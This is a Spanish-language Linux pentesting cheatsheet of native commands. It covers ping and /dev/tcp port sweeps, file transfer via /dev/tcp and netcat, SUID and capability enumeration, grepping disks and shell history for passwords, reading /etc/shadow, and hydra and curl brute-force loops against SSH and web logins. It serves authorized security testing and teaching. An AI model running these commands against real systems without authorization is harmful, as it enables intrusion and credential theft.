Linux Pentesting Cheatsheet
Comandos nativos del sistema, sin instalar herramientas externas. Ideal para entornos donde no podés llevar tu toolset. Todos estos comandos vienen preinstalados en cualquier distribución Linux estándar.
Host Discovery
ARP scan (red local)
arp-scan -l
Ping sweep (sin nmap)
for i in {1..254}; do
ping -c1 -W1 192.168.1.$i >/dev/null &&
echo "Host: 192.168.1.$i UP";
donePort scan (bash nativo)
for p in {1..1024}; do
(echo >/dev/tcp/10.0.0.1/$p) 2>/dev/null &&
echo "Puerto $p abierto";
doneDNS, WHOIS y SSL
Consultas DNS
host -t any dominio.com dig dominio.com ANY +short nslookup dominio.com
WHOIS
whois dominio.com
Certificados SSL
openssl s_client -connect host:443 \ -servername host </dev/null 2>/dev/null | openssl x509 -text
File Transfer
Servidor HTTP (Python)
python3 -m http.server 8080
Descarga con bash puro
exec 3<>/dev/tcp/192.168.1.10/8080; echo -e "GET /file.txt HTTP/1.1\r\n..." >&3; cat <&3
Netcat (si disponible)
# Receptor nc -lvnp 4444 < archivo # Emisor nc 192.168.1.10 4444 > archivo
Escalada – Info del sistema
Identificación
id; whoami; uname -a
SUID / SGID
find / -perm -4000 -type f 2>/dev/null find / -perm -2000 -type f 2>/dev/null
Capabilities
getcap -r / 2>/dev/null
Archivos escribibles globalmente
find / -writable -type f 2>/dev/null | grep -v proc | grep -v sys
Escalada – Credenciales
Buscar passwords en disco
grep -r "password" /etc/ 2>/dev/null grep -r "PASS" /home/ 2>/dev/null
Archivos recientes de root
find / -user root -mmin -60 2>/dev/null
Cron jobs
ls -la /etc/cron* cat /etc/crontab crontab -l
Procesos como root
ps aux | grep root
Escalada – Red y GTFOBins
Conexiones activas
ss -tlnp netstat -tulpn 2>/dev/null
Historial de comandos
history cat ~/.bash_history cat ~/.zsh_history
Enumerar SUIDs
for b in $(find / -perm -4000 -type f 2>/dev/null); do basename $b; done
Post-Explotación
Passwd / Shadow
cat /etc/pass[w]d cat /etc/sha[d]ow 2>/dev/null || echo "Sin permisos"
Usuarios del sistema
cut -d: -f1 /etc/pass[w]d getent passwd
Kernel / OS
uname -a; cat /etc/os-release lsb_release -a 2>/dev/null
Monturas
mount; df -h; lsblk cat /etc/fstab
Buscar IPs en /home
grep -roE "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" /home/ 2>/dev/nullFuerza Bruta
Hydra SSH
hydra -l root -P passwords.txt ssh://10.0.0.1
Hydra HTTP POST
hydra -l admin -P passwords.txt 10.0.0.1 \ http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"
Sin hydra (bash + curl)
for p in $(cat passwords.txt); do curl -s -d "user=admin&pass=$p" \ http://10.0.0.1/login.php | grep -q "incorrect" || echo "Password: $p"; done
Binarios nativos útiles
strings # Extraer texto de binarios base64 # Codificar/decodificar xxd # Hexdump od # Octal dump dd # Copia a bajo nivel tcpdump # Sniffer de paquetes script # Grabar sesion screen # Multiplexor terminal strace # Traza syscalls objdump # Desensamblador readelf # Info ELF socat # Forwarding mkfifo # Named pipes
Solo para sistemas autorizados – Uso responsable